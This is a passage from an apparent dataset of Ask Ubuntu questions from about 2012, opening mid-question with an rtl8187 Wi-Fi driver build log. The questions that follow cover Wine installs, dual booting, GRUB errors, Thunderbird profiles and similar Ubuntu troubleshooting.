/home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211.h:26 , from /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:17 : include/linux/workqueue.h:410:20 : note : expected ‘struct delayed_work *’ but argument is of type ‘struct work_struct *’ /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c : in function ‘ieee80211_wpa_set_encryption’ : /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2489:3 : error : implicit declaration of function ‘request_module’ [ -werror=implicit-function-declaration ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2518:3 : error : implicit declaration of function ‘try_module_get’ [ -werror=implicit-function-declaration ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c : at top level : /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2663:1 : warning : data definition has no type or storage class [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2663:1 : warning : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2663:1 : warning : parameter names ( without types ) in function declaration [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2664:1 : warning : data definition has no type or storage class [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2664:1 : warning : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2664:1 : warning : parameter names ( without types ) in function declaration [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2665:1 : warning : data definition has no type or storage class [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2665:1 : warning : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2665:1 : warning : parameter names ( without types ) in function declaration [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2666:1 : warning : data definition has no type or storage class [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2666:1 : warning : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2666:1 : warning : parameter names ( without types ) in function declaration [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2667:1 : warning : data definition has no type or storage class [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2667:1 : warning : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2667:1 : warning : parameter names ( without types ) in function declaration [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2668:1 : warning : data definition has no type or storage class [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2668:1 : warning : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2668:1 : warning : parameter names ( without types ) in function declaration [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2669:1 : warning : data definition has no type or storage class [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2669:1 : warning : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2669:1 : warning : parameter names ( without types ) in function declaration [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2670:1 : warning : data definition has no type or storage class [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2670:1 : warning : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2670:1 : warning : parameter names ( without types ) in function declaration [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2671:1 : warning : data definition has no type or storage class [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2671:1 : warning : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2671:1 : warning : parameter names ( without types ) in function declaration [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2672:1 : warning : data definition has no type or storage class [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2672:1 : warning : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2672:1 : warning : parameter names ( without types ) in function declaration [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2673:1 : warning : data definition has no type or storage class [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2673:1 : warning : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2673:1 : warning : parameter names ( without types ) in function declaration [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2674:1 : warning : data definition has no type or storage class [ enabled by default ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2674:1 : warning : type defaults to ‘int’ in declaration of ‘export_symbol’ [ -wimplicit-int ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:2674:1 : warning : parameter names ( without types ) in function declaration [ enabled by default ] in file included from /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.c:17:0 : /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211.h:1212:37 : warning : ‘netdev_priv’ is static but used in inline function ‘ieee80211_priv’ which is not static [ enabled by default ] cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211/ieee80211_softmac.o ] error 1 make [ 1 ] : *** [ _module_/home/me/downloads/rtl8187_linux_26.1025.0328.2007/ieee80211 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.5.0-19-generic' make : *** [ modules ] error 2 rm -f *.mod.c *.mod *.o . *.cmd *.ko *~ rm -rf /home/me/downloads/rtl8187_linux_26.1025.0328.2007/rtl8187/tmp make -c /lib/modules/3.5.0-19-generic/build m=/home/me/downloads/rtl8187_linux_26.1025.0328.2007/rtl8187 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.5.0-19-generic' cc [ m ] /home/me/downloads/rtl8187_linux_26.1025.0328.2007/rtl8187/r8187_core.o in file included from /home/me/downloads/rtl8187_linux_26.1025.0328.2007/rtl8187/r8187_core.c:64:0 : /home/me/downloads/rtl8187_linux_26.1025.0328.2007/rtl8187/r8187.h:29:26 : fatal error : linux/config.h : no such file or directory compilation terminated . make [ 2 ] : *** [ /home/me/downloads/rtl8187_linux_26.1025.0328.2007/rtl8187/r8187_core.o ] error 1 make [ 1 ] : *** [ _module_/home/me/downloads/rtl8187_linux_26.1025.0328.2007/rtl8187 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.5.0-19-generic' make : *** [ modules ] error 2 can somebody give me a hand finding out what i need to do to make my wifi card work ? update this is the output of the lsusb command bus 002 device 002 : id 0bda:8187 realtek semiconductor corp. rtl8187 wireless adapter bus 003 device 002 : id 147e:1000 upek biometric touchchip/touchstrip fingerprint sensor bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub it looks like the adapter is recognized . also i noticed that if i use the command ifconfig i see this : wlan0 link encap : ethernet hwaddr xx : xx : xx : xx : xx : xx inet addr:192.168.1.19 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : xxx : :xxx : xxx : xxxx : xxxx/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:25091 errors:0 dropped:0 overruns:0 frame:0 tx packets:12342 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:15630234 ( 15.6 mb ) tx bytes:3054709 ( 3.0 mb ) wlan1 link encap : ethernet hwaddr xx : xx : xx : xx : xx : xx up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) it looks like the computer sees the card but only if i turn on the button in the laptop that enables the internal network card . if it is of , then wlan1 ( which is my awusu36h ) is not visible . if the button is of , then computer does n't detect that card . still do n't know how to make the card work . i only want the awusu36h to work but not the integrated one . this is the outut of the command sudo lshw -c network : *-network description : wireless interface product : rt2790 wireless 802.11n 1t/2r pcie vendor : ralink corp. physical id : 0 bus info : pci @ 0000:06:00.0 logical name : wlan0 version : 00 serial : xx : xx : xx : xx : xx : xx width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=3.5.0-19-generic firmware=0.34 ip=192.168.1.19 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : fe9f0000-fe9fffff *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth0 version : 02 serial : 00:21:85 : dc:36:27 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:41 ioport : e800 ( size=256 ) memory : febff000-febfffff memory : f7ff0000-f7ffffff memory : febc0000-febdffff
229679	usb installation reports disk full	when installing ubuntu 12.10 via live usb , message pops up reporting partition is full . i was n't even given an option to select the partition i want to use . any suggestions ?
229681	restore default keyboard shortcut for workspace switcher/show desktop	i tried setting the default keyboard shortcut to hide normal windows ( show desktop ) to super + s. it did n't work and now whenever i press super + s , i get the workspace switcher . i tried setting hide normal windows back to ctrl + super + s , but it does n't work . i 'm still getting the workspace switcher . how can i reset these two settings ? i use the show desktop quite a lot and it is quite annoying not being able to do it .
229683	reduce the delay of touchpad disable while typing	i set the setting to disable touchpad while typing . is there a way to reduce the default delay to start using it again after stopping typing ?
229690	how to exclude files like 'unitydashlegalseen ' from syncing in grsync ?	i have been backing up my home folder with grsync for several years now . with the introduction of the legal confirmation in the unity dash ( 12.10 ) i am getting a file called 'unitydashlegalseen ' in '/home/username/.cache/ ' that gives a permission error when syncing in grsync . i googled and thought i could exclude this file in from syncing grsync under advanced options/additional options . the command i guessed is obviously wrong as it does not work , does somebody know what i correctly have to put in ? this is the wrong command i used : -- exclude '/home/username/.cache/unitydashlegalseen'
229691	how to change gnome 3.2.6 panel background color	i am using ubunut 12.10 with gnome-shell 3.6.2 . i want to change the background color of the panel appearing top of the screen . i am currently using following theme as described in tweak tool : current theme : adwaitacursor theme : adwaitagtk+ theme : adwaita i have tried using gconf-editor and dconf-editor but none of them are showing the background color option for the panel . can any one suggest me a solution to above ?
229695	why flush torrent client would not start ?	flush is a torrent client similar to deluge or qbittorrent , is the lightest , and i have used it along qbittorrent without any problem for some time . but after reinstalling the os i used only qbittorent for a while ; now when i want to try flush again i have a problem : after i install it , execute it , and see some action of the processor ( i see that light flashing a few secs like when a program starts ) , but then nothing happens . at first view , this looks similar to a problem reported in connection with foxitreader , that i also encountered and solved according to the answer . it would have been similar , except that in the case of foxitreader the program was absent in usr/bin , and putting it there manually after extracting it from deb solved the problem . in the case of flush , it is already in usr/bin . i see it in synaptic , in launcher , in menu , in run ( alt-f2 ) and usr/bin : nothing works . ( in the case of foxitreader , the program appeared in menu , launcher , and synaptic , but not in run and not in usr/bin . ) i have installed flush from synaptic ( currently 0.9.12 ) and have also tried the deb version 0.9.10 with identical results . ( i 'm in lubuntu 12.04 ) . ( the same happens when i try frostwire . ) edit after comment : after running flush in terminal i get : ~ $ flush ( flush:3711 ) : glib-warning ** : /build/buildd/glib2.0-2.32.3/./glib/goption.c:2179 : ignoring no-arg , optional-arg or filename flags ( 8 ) on option of arg-type 0 in entry main : version ( flush:3711 ) : glib-warning ** : /build/buildd/glib2.0-2.32.3/./glib/goption.c:2179 : ignoring no-arg , optional-arg or filename flags ( 16 ) on option of arg-type 4 in entry main : config ( flush:3711 ) : glib-warning ** : /build/buildd/glib2.0-2.32.3/./glib/goption.c:2179 : ignoring no-arg , optional-arg or filename flags ( 8 ) on option of arg-type 0 in entry main : only-pass flush : symbol lookup error : flush : undefined symbol : _zn10libtorrent7sessionc1erkns_11fingerprinteii
229700	unable to install wine	i am trying to install wine 1.5 , but i keep getting errors . i am trying to install via terminal . i have ubuntu 12.10 x64 . here are the steps i have took all in order . sudo add-apt-repository ppa : ubuntu-wine/ppa you are about to add the following ppa to your system : welcome to the wine team ppa . here you can get the latest available wine betas for every supported version of ubuntu . this ppa is managed by scott ritchie and maarten lankhorst . more info : https : //launchpad.net/~ubuntu-wine/+archive/ppa press [ enter ] to continue or ctrl-c to cancel adding it gpg : keyring `/tmp/tmplm7whr/secring.gpg ' created gpg : keyring `/tmp/tmplm7whr/pubring.gpg ' created gpg : requesting key f9cb8db0 from hkp server keyserver.ubuntu.com gpg : /tmp/tmplm7whr/trustdb.gpg : trustdb created gpg : key f9cb8db0 : public key `` launchpad ppa for ubuntu wine team '' imported gpg : no ultimately trusted keys found gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok sudo apt-get update ign http : //security.ubuntu.com quantal-security inrelease ign http : //archive.ubuntu.com quantal inrelease ign http : //ppa.launchpad.net quantal inrelease get:1 http : //security.ubuntu.com quantal-security release.gpg [ 933 b ] ign http : //archive.ubuntu.com quantal-updates inrelease hit http : //ppa.launchpad.net quantal release.gpg get:2 http : //security.ubuntu.com quantal-security release [ 49.6 kb ] hit http : //archive.ubuntu.com quantal release.gpg hit http : //ppa.launchpad.net quantal release get:3 http : //archive.ubuntu.com quantal-updates release.gpg [ 933 b ] get:4 http : //security.ubuntu.com quantal-security/main amd64 packages [ 60.0 kb ] hit http : //ppa.launchpad.net quantal/main sources hit http : //archive.ubuntu.com quantal release hit http : //ppa.launchpad.net quantal/main amd64 packages get:5 http : //archive.ubuntu.com quantal-updates release [ 49.6 kb ] get:6 http : //security.ubuntu.com quantal-security/restricted amd64 packages [ 14 b ] hit http : //archive.ubuntu.com quantal/main amd64 packages get:7 http : //security.ubuntu.com quantal-security/universe amd64 packages [ 20.7 kb ] hit http : //archive.ubuntu.com quantal/restricted amd64 packages hit http : //archive.ubuntu.com quantal/universe amd64 packages get:8 http : //security.ubuntu.com quantal-security/multiverse amd64 packages [ 1,150 b ] ign http : //ppa.launchpad.net quantal/main translation-en_us hit http : //archive.ubuntu.com quantal/multiverse amd64 packages ign http : //ppa.launchpad.net quantal/main translation-en hit http : //security.ubuntu.com quantal-security/main translation-en hit http : //archive.ubuntu.com quantal/main translation-en hit http : //security.ubuntu.com quantal-security/multiverse translation-en hit http : //archive.ubuntu.com quantal/multiverse translation-en hit http : //security.ubuntu.com quantal-security/restricted translation-en hit http : //archive.ubuntu.com quantal/restricted translation-en hit http : //security.ubuntu.com quantal-security/universe translation-en hit http : //archive.ubuntu.com quantal/universe translation-en get:9 http : //archive.ubuntu.com quantal-updates/main amd64 packages [ 149 kb ] get:10 http : //archive.ubuntu.com quantal-updates/restricted amd64 packages [ 1,970 b ] get:11 http : //archive.ubuntu.com quantal-updates/universe amd64 packages [ 131 kb ] ign http : //security.ubuntu.com quantal-security/main translation-en_us get:12 http : //archive.ubuntu.com quantal-updates/multiverse amd64 packages [ 7,936 b ] ign http : //security.ubuntu.com quantal-security/multiverse translation-en_us ign http : //security.ubuntu.com quantal-security/restricted translation-en_us ign http : //security.ubuntu.com quantal-security/universe translation-en_us hit http : //archive.ubuntu.com quantal-updates/main translation-en hit http : //archive.ubuntu.com quantal-updates/multiverse translation-en hit http : //archive.ubuntu.com quantal-updates/restricted translation-en hit http : //archive.ubuntu.com quantal-updates/universe translation-en ign http : //archive.ubuntu.com quantal/main translation-en_us ign http : //archive.ubuntu.com quantal/multiverse translation-en_us ign http : //archive.ubuntu.com quantal/restricted translation-en_us ign http : //archive.ubuntu.com quantal/universe translation-en_us ign http : //archive.ubuntu.com quantal-updates/main translation-en_us ign http : //archive.ubuntu.com quantal-updates/multiverse translation-en_us ign http : //archive.ubuntu.com quantal-updates/restricted translation-en_us ign http : //archive.ubuntu.com quantal-updates/universe translation-en_us fetched 473 kb in 21s ( 22.5 kb/s ) reading package lists ... done sudo apt-get install wine1.5 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine1.5 : depends : wine1.5-i386 ( = 1.5.19-0ubuntu1 ) but it is not installable recommends : ttf-droid recommends : ttf-mscorefonts-installer but it is not going to be installed recommends : ttf-umefont but it is not going to be installed recommends : ttf-unfonts-core but it is not going to be installed recommends : winbind but it is not going to be installed recommends : winetricks but it is not going to be installed e : unable to correct problems , you have held broken packages . i would really appreciate help , as i need wine for a couple sales quota tracking software which are windows native . and a couple games .
229705	finding an apt-get installation	warning : totally noob question ... i just started using ubuntu at home , and i love it , but there are some basic stuff that i do n't know how to do and is annoying me ... when i install a package using sudo apt-get install ... i do n't even know where the installed package is . for some packages it does n't really matter to me , but for some it does ... example : i just installed vim , and i would like to create a shortcut to vim on my desktop . how would i do this ? how can i find the folder where it was installed and know which executable i need to shortcut ? ... maybe coming from the world of windows , i 'm not even thinking like a linux user , so feel free to correct me ... : )
229706	what 's the difference between .xresources and .xdefaults ?	how are these two files connected to xrdb ? should i have both , or just one in my home directory ? do lines like these go in either file ? xterm*background : white urxvt.font : xft : monospace
229708	does installing ubuntu overwrite windows bootloader ?	so there 's the question . i want to preserve my original windows 7 loader .
229715	booting ubuntu failure : error : attempt to read or write outside of disk 'hd0 '	i have installed ubuntu 12.10 in a western digital external hard drive ( 320gb ) . this is a complete installation , not a live usb . when i plug it in my hp desktop i go to the bios settings and boot off the hard drive , everything work perfectly as it should . now this works on every single computer and laptop in my house ( all hp ) , except for one . my hp probook 4530s . when i select to boot of the usb i get the message : error : attempt to read or write outside of disk 'hd0' now , i have removed the hard drive from my laptop and the external drive is the only drive plugged in . below is a screenshot of the message on the screen . after the message i navigate to ls / ( as shown below ) : after here i try to acces other folders under ls / , for example , i try to go to ls /boot to get to the grub folder . then i get the same message as before : as shown below : grub rescue > ls /boot error : attempt to read or write outside of disk 'hd0' grub rescue > _ the only folders i can access without getting the message again are /home , /run and /usr . so how do i : boot ubuntu from grub2 ( this screen ) manually set to automatically boot ubuntu if possible an explanation for this problem thanks !
229718	ubuntu shortcuts	where can i see a list of ubuntu shortcuts/hotkeys ? the kinds of things i would like to do are like ( using windows ) : winkey + r = run command winkey + t = focus on the task bar ctrl + shift + n = create a new folder alt + d = focus on the address of the windows/file explorer thanks
229721	i can not access google plus with firefox and chrome/chromium but i can with midori/epiphany , how can i solve it ?	i 'm having this weird issue where i can access g+ only with epiphany and midori . with firefox and chrome/chromium i have several problems opening the page , and when it opens does n't work properly . 多any idea of what can it be or how to solve it ?
229725	how to setup debian/control to force updating a library ?	this question is aimed at ppa/packages maintainers . i have a ppa with 2 packages : mypackage ( currently version 1~ppa1~quantal ) mypackagelib ( currently version 1~ppa1~quantal ) currently , the control file of mypackage has : depends : mypackagelib i want to update the 2 packages to version '2 ' ( mypackage version 2 and mypackagelib version 2 ) . how can i make sure that the 2 packages will be updated when the user updates 'mypackage ' ? fyi , changing the 'depends ' field to : depends : mypackagelib ( > = 2 ) does not work , and returns the following error : mypackage : depends : mypackagelib ( > = 2 ) but mypackagelib-2~ppa1~quantal is to be installed
229726	can i set ubuntu 12.10 to automatically reboot to windows once only ?	is there some way when i 'm in ubuntu 12.10 that i can set it to reboot automatically to windows just once , so that when i 'm in windows i can reboot and it will automatically boot back into ubuntu ? i need this because often when i travel i access my home computer for email and other personal info that i do n't want to travel with or leave to the tender mercies of the `` cloud '' . on rare occasions , i need to temporarily boot into windows 7 to do something windows-specific , but then i want to be able to boot back into ubuntu because that 's where most of my computing takes place . any ideas ? thanks in advance ! bill
229727	xorg.conf fails to build	i am trying to build an xorg.conf file in lubuntu 12.10 using a tty login . i am following the documentation at lubuntu workarounds . it asks me to stop the lxdm service in order to run xorg -configure to build a xorg.conf file , which i can then tweak to get my display 's running correctly ( without dead space ) . the problem is that my computer claims that no lxdm service exists to `` stop . '' how should i go about killing the current session so i can run xorg -configure ? i have been able to configure xorg in a new display session ( display1 ) but it does n't find the drivers or correct display settings , perhaps because i can not kill the current session . thanks !
229729	ubuntu 12.10 fresh install blank screen issue with gateway nv7802u laptop	before flagging this question as a possible duplicate , and saying that i have not done any research , give me a moment to explain the issue . i have done search after search on google , on ask ubuntu , and ubuntuforums , i have read about solution to the problems that were similar to mine but i still have not solved the problem . ever since ubuntu 10.04 i believe i can not use my laptop monitor , it just boots up blank and even while installation , i know it is probably driver related . this probably the reason why i have n't used ubuntu in a while and i would like to give it another try . i obviously do n't want to get a new laptop although getting a new one might solve the problem . it is n't that old either and it runs very well for its age . my specs 4 gb ram 64-bit intel core 2 duo 500 gb sata hardisk intel gma 4500 ( integrated graphics ) gateway nv7802u what i have tried nomodeset ( it freezes after the screen says low graphics detected ) i have tried looking for additional hardware drivers none available . i have tried numerous settings like apci_backlight=vendor and nothing ever changes its like the solutions i have been reading are n't doing nothing . it is not hardware issue because windows can run fine including the new windows 8 . i also had the same issue with fedora a while back when i used it but i fixed it by finding the drivers for my graphics card . my question how can i fix this , i already installed it and clearly i can use my laptop if hooked to an external monitor via vga but my laptop just stays blank or pretty much dim to the point that you can not see anything . it could it be that unity is the problem . i like unity but if it means using gnome then fine by me .
229748	install ubuntu 12.04 on drive `` d '' ?	i have a dell inspiron 531s that originally came loaded with windows vista . a couple years ago i purchased a copy of windows 7 , formatted the hard drive and installed the updated operating system . in the process i formatted the 10 gb recovery drive partition on drive d as it was no longer needed for windows vista . i would really like to install ubuntu 12.04 lts alongside windows 7 using the empty 10 gb drive d : . i have two questions . ( 1 ) can ubuntu be installed on a separate partition , a drive removed from the boot sector on drive c : ? ( 2 ) if so would grub be installed in the boot sector and properly select windows 7 on drive c : or ubuntu 12.04 on drive d ?
229757	ubuntu 12.04 transparent menubar	is it possible set transparent color to the part of the window displayed on the image below ?
229759	ubuntu 12.10 + windows 7 - no option to install alongside windows 7	i have a 64-bit windows 7 os installed at the moment . i have used gparted to shrink the current windows 7 partition on my 720gb hdd to 200gb . i have then made a new ntfs partition of 200gb which i will keep for later on as a shared drive between both windows 7 and ubuntu . so in gparted i now have 3 partitions which were all automatically there from the windows 7 installation , i only shrank the 3rd one from the 698gb or so that it was to 200gb and created the 200gb for the shared drive . i first tried creating another 200gb partition at this stage to install ubuntu too but when i burnt the dvd and loaded it , ubuntu gave me no option to install alongside windows , only the option to erase the entire disk and install ubuntu on the blank drive ... not what i want to do . so i tried installing it through clicking 'something else ' , it downloaded all the install files but did n't install . i then had a lot of problems with getting the dvd drive to work and what not but now have this fixed so i can use windows again . so now i 've used gparted to delete the partitions so again i 'm now left with the 3 partitions there which windows 7 automatically installs and a 200gb ntfs partition i will later use as a shared drive . booting up from the ubuntu disc and again there is no option to install alongside windows 7 . how do i get it to do so ? all i would like is windows 7 and ubuntu on a dual boot , with a 200gb ntfs partition to dump my work onto so that i can access it from both os 's . thanks . edit : /dev/sda1 - fat32 - /boot/efi - 100mb /dev/sda2 - unknown - 128mb /dev/sda3 - ntfs - 200gb /dev/sda4 - ntfs - 297gb /dev/sda5 - ext4 - / - 191gb /dev/sda6 - linux-swap - 10gb
229767	virtual box or disk partition	i am a windows7 user and have never used a linux os . i want to try debian on my machine . what are the advantages/disadvantages of the following two options ? 1 ) partition my hard drive and install linux onto the partition . 2 ) use virtual box to set up a virtual machine ? thanks
229769	ubuntu 12.04 , mytvbuntu , no sound from hdmi , analog works fine	i 'm trying to get sound out of my hdmi port from mythbuntu system . i have sound via the analog connection but nothing from the hdmi port ... thanks
229770	how do i show the current amount of fragmentation on a btrfs filesystem	wiki pages for btrfs and other how-tos talk about online defragmentation and other related topics but they do n't say how to find out how fragmented a file system is . is there a method to determine how many files are fragmented or to produce some other meassure of file system fragmentation ?
229778	onda communication tm201 problem with usb modem	after having done a very long research , about this type of usb-modem , i 'm here asking for your help . in my pc i have installed lubuntu ( the version obtained from ubuntu 12.04 ) . in order to connect the usb-modem , i have to eject the usb-storage ( that is firstly recognized by the system ) and then , i can use the normal gnome-networkmanager tool . the problem is that i would avoid having , all the times , eject manually the inner usb-storage , configuring the system in order to proceed on ignoring the present storage and treat the usb-device only as a modem . the included linux-setup tool , does n't work properly ( i have tried to install it , without success ) . i have tried to configure usb_modeswitch , but i do n't have enough informations ( this version of usb-modem , is not included on the device-recognition files ) . to not mention that , at this time , the default vendor and product hex-ids are currently unknown at me . i barely managed to obtain the specific ids , running the command lsusb , but of course , without such informations , i ca n't proceed with the command , as the parameters are insufficient . i thought to create a script file , that would umount the usb-storage part , then use modprobe and usb_modeswitch , in order to automate the connection setup , but i ca n't manage to umount anything ( that the system seems to ignore my commands ) and i ca n't proceed with the initialization . there 's a standard way to handle this situation accordingly ?
229779	transfer thunderbird ( 17 ) profile on win7 to ubuntu 12.04	i want to transfer thunderbird profile on win7 to thunderbird ( 17 ) on ubuntu 12.04 . i have already copied the profile folder from windows to ubuntu and modified profile.ini on the ubuntu machine to include [ profile ] name=bill isrelative=1 path= ( the name of the transfered profile folder ) i think the problem is that the windows thunderbird profile content ( files and folder structure ) looks very different to that of the ubuntu thunderbird profile 's that was created on installation . the ubuntu install is new where as the windows thunderbird has undergone many updates . seems the system for profile storage has changed drastically . i tried to start thunderbird in safe mode but could n't get the path correct to start thunderbird in the terminal with the -safe-mode switch . what can i do ? bill i did not succeed but i 'm not sure the exact procedure . not sure what options to set in the extension nor am i sure which import choice to use . i went to the importexporttool web sight and sent an email to the them asking for clarification on how to do this . it read : '' i 'm not having much luck with using importexporttool for profile transfer . i have 2 laptops ( 1 ) win7 with tunderbird ( tb ) 17 and ( 2 ) unbuntu 12.04 with tb 17 . i 've tried exporting from ( 1 ) to use to set up ( 2 ) but all i got was a lot of empty folder under inbox including folders named `` extensions '' and lots of other non-mailbox titles . do you have a reference url that explains how to do this correctly including the correct options to set in importexporttool ? '' may they can help . bill
229781	trying this again ... live boot on arm device	to those who feel this is a duplicate , please first read http : //en.wikipedia.org/wiki/live_cd to better understand the concept of what i am asking . also note that the live-cd tag specifically addresses `` questions related to live cds , which allow you to test drive ubuntu without installing it . '' i am looking for information on running ubuntu on an arm device specifically without installing it , e.g a live boot . installing ubuntu on a transformer is sufficiently documented , and i understand the process . however , i can find only a little information regarding a live ubuntu session booted into ram ( such as possible with the pc ubuntu cd ) as _opposed_ to installing it on the device . this bit that i found confirmed that it can be done , but did not clarify . can anybody comment on any experiences that they have either had or have heard of regarding this issue ? thanks you , and i am sorry about double posting but i was most definitely miss understood .
229782	export all slides in libreoffice impress to pdf	i am writing a script that could take any type of presentation and export the slides to a pdf , but if any of the slides are hidden they are not exported to the pdf . is it possible to export all the slides in the presentation to a pdf hidden or not ? is there an option i need to enable to do this or is it just not possible ? i 've found the option in the gui , its called export hidden pages , how would i configure this to be done when using a command like : libreoffice -- headless -- convert-to pdf somepresentation.ppt
229786	creating a ftp server on ubuntu desktop	i would like to make a ftp server on a ubuntu desktop . i am unable to make a ubuntu server install for various reasons , but would like to make a small ftp server , so i can connect to it from my router and the internet . i would also like to run a minecraft server on it , is that possible ? thank-you in advance .
